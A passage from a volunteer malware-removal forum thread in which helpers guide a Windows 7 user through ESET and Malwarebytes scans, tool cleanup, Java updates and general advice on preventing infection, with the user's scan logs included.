Logfile: scan 4.11.2017.txt
Administrator: Yes

-Software Information-
Version: 3.0.6.1469
Components Version: 1.0.96
Update Package Version: 1.0.1622
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: KEKLR-PC\KEKLR

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 377074
Time Elapsed: 17 min, 42 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 0
(No malicious items detected)

Physical Sector: 0
(No malicious items detected)

(end)



#34 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 09:48 PM

I'm no longer getting the message about changing home page.  Ran all scans.  The cleaning even took care of an annoying Epson error when restarting computer.

Will see how it works tomorrow evening. I sure do appreciate all your help. Couldn't have done it without your persistence and knowledge and clear instructions on what to do and how to do it.



#35 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 12 April 2017 - 05:23 AM

Hello krtate.

You're welcome!

The scans went well and I can see in your logs that the tools cleaned up some stuff related to adware and temporary files.

 

Does it matter that my computer restarted and downloaded updates before I do all the steps above?

Usually the updates are performed after the cleaning process. However those updates most likely belong to your Windows Operating System that may have been set to perform updates automatically. Since there were no more traces of the rootkit before the updates started, most likely there will be no problem.


Now, there is some more work to do yet. To ensure that your computer will be completely clean, let's check for leftovers using ESET Online Scanner. It's a very thorough scan and it may take some time to complete but it's worth it.

Please scan your computer with ESET Online Scanner.

  • Click on this link to open ESET Online Scanner in a new window.
    • Click on the Scan Now button to download the esetonlinescanner_enu.exe file. Save it to your Desktop.
    • Close all your programs and browsers.
    • Please disable your antivirus program to avoid potential conflicts, improve the performance and speed up the scan.
    • Double click on esetonlinescanner_enu.exe to start ESET Online Scanner. It will open a window with the Terms of Use.
  • Check mark Download latest version of ESET Online Scanner and click the Accept button.
  • Click Yes to accept any security warnings that may appear.
  • Under Computer scan settings, check mark Enable detection of potentially unwanted applications.
  • Then click Advanced settings and check mark the following options:
    • Enable detection of potentially unsafe applications
    • Clean threats automatically
  • Click the Scan button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats.
  • Click Export, and save the file to your Desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

Note: If nothing is found, it will not produce a log.

Please re-enable your antivirus program.


Please post the ESET log (if it produced one) and let me know if there are still any issues with the computer.


Thank you.


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#36 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 12 April 2017 - 05:39 AM

Thank you, I will run this scan later today.



#37 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 12 April 2017 - 09:13 PM

this is what the ESET scan found

C:\Users\KEKLR\AppData\LocalLow\Sun\Java\jre1.8.0_31\java_sp.dll a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application cleaned by deleting
C:\Users\KEKLR\Downloads\CuteWriter.exe a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application cleaned by deleting



#38 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 12 April 2017 - 09:19 PM

I didn't have the options:

  • Click Export, and save the file to your Desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

I could click on "save to text file", but no Export option, no back button, no finish button.

My options are "do not clean", "clean selected" or "clean all" or just X to close.



#39 Rocket Grannie

Rocket Grannie

    SWI Australian Rebel

  • Administrators
  • PipPipPipPipPip
  • 7,788 posts

Posted 13 April 2017 - 08:07 PM

Hello krtate

Android 8888 is away for a few days so I will be helping you.

My options are "do not clean", "clean selected" or "clean all" or just X to close.

Please click X to close as it has deleted the two entries it found.

The good news is your computer appears to be clean.

Now some housekeeping:

Please download Security Analysis by Rocket Grannie from here
  • Save it to your Desktop.
  • Close your security software to avoid potential conflicts.
  • Double click RGSA.exe
  • Click OK on the copyright-disclaimer
  • It will produce a log named SALog.txt on the Desktop or in the same folder from where the tool is run if installed elsewhere.
  • Please copy and paste the contents of that log in this topic.

Note: If you get a Warning from Windows about running the program, click on More info and then click Run Anyway to run it even though Windows says it might put your PC at risk.

Download delfix.pngDelFix (by Xplode) and save it to your Desktop.

Close all running programs and start delfix.exe.
Make sure that all available options are checked.
Click on Run
DelFix should remove all our tools and delete itself afterwards.
I don't need to see the log file.

Please post the SALog

How is the computer running now?


Rocket Grannie
 
a91.gif


 
My help is free, but if you wish to help keep these forums running please consider a donation, see here for details.

#40 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 14 April 2017 - 05:33 AM

Result of Security Analysis by Rocket Grannie (x86) Updated: 5th April, 2017
Running from:C:\Users\KEKLR\Desktop (06:31:51 - 04/14/2017)
***---------------------------------------------------------***
Microsoft Windows 7 Home Premium X64 Service Pack 1
UAC is Enabled!
Internet Explorer 11
Default Browser: Internet Explorer
***------------Antivirus - Antispyware - Firewall-----------***
Microsoft Security Essentials (Disabled - Up to Date)
Malwarebytes (Disabled - Up to Date)
Malwarebytes (Disabled - Up to Date)
Microsoft Security Essentials (Disabled - Up to Date)
Windows Defender (Disabled - Not Up to Date)
Windows Firewall (Enabled)
*No other Firewall Installed*
***-------Security Programs - Browsers - Miscellaneous------***
Adobe Flash Player 24 NPAPI (version 25.0.0.148)
Firefox (version 52)
Google Chrome (version 55)
Malwarebytes (version 3.0.6.1469)
Microsoft Security Essentials (version 4.10)
Microsoft Silverlight (version 5.1)
Windows Live Essentials (version 16.4)

HiJackThis (version 1.0.0) is *out of Date*
Java 8 Update 45 (version 8.0.450) is *out of Date*

***----------------Analysis Complete-------------------------***



#41 Rocket Grannie

Rocket Grannie

    SWI Australian Rebel

  • Administrators
  • PipPipPipPipPip
  • 7,788 posts

Posted 14 April 2017 - 06:59 PM

Hello krtate

I suggest you uninstall HiJackThis (version 1.0.0) as it is an out of date program.

Please enable all your security programs.

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended https://java.com/en/download/

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmic...java-0-day-fix/

Once you have installed the newest version, please remove the old version using Programs and Features in Control Panel.

Are there any further problems?


Rocket Grannie
 


a91.gif


 
My help is free, but if you wish to help keep these forums running please consider a donation, see here for details.

#42 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 14 April 2017 - 07:54 PM

Thank you, I uninstalled HiJackThis, installed Java and then it uninstalled the old version.

That link doesn't take me to blog TrendMicro, it's still in Spywareforum.

 

Also I see WinPcap4.1.3 installed 3.15.2017 do you know what that is? 

 

Should I have Microsoft Security Essentials running along with the premium trial version of MalwareBytes?

 

I think Trend Micro downloaded it when I scanned in March. I think I selected Home Network scan, I probably don't need that.

 

I also had a usb stick connected to my system to back up some files, do you think the usb stick should be scanned?


Edited by krtate, 14 April 2017 - 08:01 PM.


#43 Rocket Grannie

Rocket Grannie

    SWI Australian Rebel

  • Administrators
  • PipPipPipPipPip
  • 7,788 posts

Posted 14 April 2017 - 08:31 PM

Hello krtate
 

 

That link doesn't take me to blog TrendMicro, it's still in Spywareforum.

Thank you I have corrected it.

WinPcap4.1.3
It is a program that is used to monitor network traffic by programs such as Wireshark.
For more information please see here
 

 

Should I have Microsoft Security Essentials running along with the premium trial version of MalwareBytes?

No! MSE is only compatible with the free version of MBAM.
If you wish to keep using the premium version of MBAM you need to disable MSE and download an antivirus program that can be run in conjunction with the premium version of MBAM

All of the following are excellent free antiviruses. Be sure to only install one.

Avast.
Avira
AVG
 

 

I also had a usb stick connected to my system to back up some files, do you think the usb stick should be scanned?

If it was connected during the cleaning of the computer then it has already been scanned.
If it wasn't connected then yes it needs to be scanned by whichever security programs your decide to keep activated.
Warning: Do not open the USB until after it has been scanned as this could reinfect the computer.

Any further problems?


Rocket Grannie
 


a91.gif


 
My help is free, but if you wish to help keep these forums running please consider a donation, see here for details.

#44 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 15 April 2017 - 05:59 AM

Thank you, I scanned the USB with Malwarebytes and MSE and found nothing. I had disconnected as in the instructions early on stated to remove all USB.

Computer seems to be running faster, not having to wait as long to load IE or Firefox.

What exactly could the Rootkit have done, steal passwords?

 

I really appreciate all the help I received.



#45 Rocket Grannie

Rocket Grannie

    SWI Australian Rebel

  • Administrators
  • PipPipPipPipPip
  • 7,788 posts

Posted 15 April 2017 - 05:57 PM

Hello krtate
 

 

What exactly could the Rootkit have done, steal passwords?

Basically, a rootkit has full and complete access to the computer. For information see: here
 

 

I really appreciate all the help I received.

You are welcome.

 

Below I have included a number of recommendations for how to protect your computer in order to prevent future malware infections.
Please take these recommendations seriously; these few simple steps can stave off the vast majority of spyware problems.
 
Keep your Antivirus program up-to-date.
 
Please note: Many installer offer third-party downloads that are installed automatically when you do not uncheck certain checkboxes. Please uncheck them if you don't want or use them. While most of the time not being malicious you usually do not want these on your computer. Be careful during the installation process and you will avoid seeing tons of new unwanted toolbars in your favorite web browser.
 
Please consider installing and running some of the following programs; they are either free or have free versions of commercial programs:
Keep Malwarebytes update and perform a regular scan to your system as it will make it harder for malware to reside on your computer.
A tutorial on using Malwarebytes can be found here
Please Note that only the paid for version has real time capabilities.
 
A free non-resident utility to prevent the installation of ActiveX-based malware is JavaCool's SpywareBlaster, available here
Please note that the free version of SpywareBlaster needs manual updates.
 
Please keep these programs up-to-date and run them whenever you suspect a problem to prevent malware problems. A number of programs have resident protection and it is a good idea to run the resident protection of one of each type of program to maintain protection. However, it is important to run only one resident program of each type since they can conflict and become less effective. That means only one antivirus, firewall and scanning anti-spyware program at a time. Passive protectors, like SpywareBlaster can be run with any of them.
 
Note that there are a lot of rogue programs out there that want to scare you into giving them your money and some malware actually claims to be security programs. If you get a popup for a security program that you did not install yourself, DO NOT click on it and ask for help immediately. It is very important to run an antivirus and firewall, but you can't always rely on reviews and ads for information. Ask in a security forum that you trust if you are not sure. If you are unsure and looking for anti-spyware programs, you can find out if it is a rogue here:


A similar category of programs is now called "scareware." Scareware programs are active infections that will pop-up on your computer and tell you that you are infected. If you look closely, it will usually have a name that looks like it might be legitimate, but it is NOT one of the programs you installed. It tells you to click and install it right away. If you click on any part of it, including the 'X' to close it, you may actually help it infect your computer further. Keeping protection updated and running resident protection can help prevent these infections. If it happens anyway, get offline as quickly as you can. Pull the internet connection cable or shut down the computer if you have to. Contact someone to help by using another computer if possible. These programs are also sometimes called 'rogues', but they are different than the older version of rogues mentioned above.
 
Another most feared threat at the moment is an infection by a Ransomware. A Ransomware infection is a program that ransoms the data or functionality of your computer until you perform an action. This action is typically to pay a ransom in the form of Bitcoins or another payment method. I advise you to read more info on this terrible threat here and here.
 
Please keep your programs up to date. This applies to Adobe Flash Player, Adobe Reader, Java, Microsoft Silverlight, WinPatrol and all your Internet Browsers in particular. Vulnerabilities in these programs are often exploited in order to install malware on your PC. Visiting a prepared web page suffices to infect your system.
Run a program like Personal Software Inspector (PSI) or FileHippo Update Checker to see what programs need to be updated.
Be careful with flash drives, as they can spread infections. See this post on USB/flash drive safety.
 
Stay away from P2P software; even with a clean P2P program, their networks are often riddled with malware.
 
Don't click on attachments or links in e-mail, and read your e-mail in text-only mode for the highest safety.
 
Don't click on links received in instant message programs.
 
A HOSTS file will prevent Internet Explorer from communicating with sites known to be associated with adware or spyware. A good regularly updated HOST file is MVPS HOSTS File, available here
 
For much more useful information, please also read Tony Klein's excellent article: How did I get infected in the first place
 
Hopefully these steps will help to keep you error free. If you run into more difficulty, we will certainly do what we can to help.
 
Safe Surfing


Rocket Grannie
 


a91.gif


 
My help is free, but if you wish to help keep these forums running please consider a donation, see here for details.

#46 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 23 April 2017 - 06:10 AM

I downloaded Spywareblaster, FileHippo, Hosts File and Avira.  When the premium version of Malwarebytes reverts to the free version. What is best to use for AntiVirus, go back to Microsoft Security Essentials?  I'm not sure what get run together.

 

Yesterday FileHippo advised I needed to update some programs, If I recall it was Java, Java Environment, Skype, CutePDFWriter, Adobe Air and Firefox Beta.

I updated Java first, then I selected to update Java Environment, Skype, CutePDF Writer, and I think Adobe Air at one time.

Malwarebytes quarantined PUP.Optional.APNToolBar. I don't know from which file updated this came from. I assume maybe Skype or CutePDF Writer.

Adobe Air and CutePDFWrite didn't update it's still on the list.  I restarted my computer and ran Malwarebytes again and it quarantined The PUP again plus PUP.Optional.Ask

I ran again and it was clean, I ran Housecall and it was clean, though Avira quarantined Bonjour.exe from Housecall.

 

Is there a way to scan the update for malicious files before updating using FileHippo to update?

 

I'm restarting one more time and scanning to see if anything is found.

 

edited to add:  Is it best to subscribe to Malwarebytes paid version?   Also Avira must be such a huge file it takes 3 minutes before I get internet connection when restarting.


Edited by krtate, 23 April 2017 - 06:29 AM.


#47 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 23 April 2017 - 07:01 AM

Just completed scanning again and MalwareBytes scan was clean.



#48 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 23 April 2017 - 07:06 PM

Hello krtate.

 

I'm back.
 

When the premium version of Malwarebytes reverts to the free version. What is best to use for AntiVirus, go back to Microsoft Security Essentials?  I'm not sure what get run together.

You can run Microsoft Security Essentials or any of the free antivirus programs listed below along with Malwarebytes Free version. All of them are excellent free antiviruses. Be sure to only install one.

Avast Free Antivirus
Avira Free Antivirus
AVG Free Antivirus


 

I ran again and it was clean, I ran Housecall and it was clean, though Avira quarantined Bonjour.exe from Housecall.

Usually Bonjour.exe is a legitimate file used to find printers and file-sharing servers. That could be a false positive --- A false positive occurs when the scanning reports finding a virus when there is in fact no virus present. If you don't trust a file you can also submit it to an online Antivirus scan such as VirusTotal. Then, if the scan comes clean you can add an 'Exception' to that file for Avira and/or for Housecall.

How to add exceptions for Avira Antivirus
How to add exceptions to Trend Micro Security software

 

Is there a way to scan the update for malicious files before updating using FileHippo to update?

When you perform a manual update of a program (directly from the official program's website), usually you download the latest version of the Installer/Setup file of that program to your computer and then executes it. But before you run it you can either scan the file with your antivirus program or submit it to an online scan with VirusTotal to check if it is reliable or not.

 

Is it best to subscribe to Malwarebytes paid version?

I would strongly advise you to purchase the premium version. However, this decision is up to you.
Please go here
Scroll down to find a comparison list of the two versions (Free and Premium).

 

Also Avira must be such a huge file it takes 3 minutes before I get internet connection when restarting.

I don't use Avira so I don't know if that behavior is normal or not.
You can try to install and test another antivirus listed above to figure out which one fits your expectations.

 

Just completed scanning again and MalwareBytes scan was clean.

This is a good sign. Through the reports in your previous post it appears your computer is clean.

 

Are there any issues or concerns with your computer?


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Member of

Support SpywareInfo Forum - click the button
PayPal - The safer, easier way to pay online!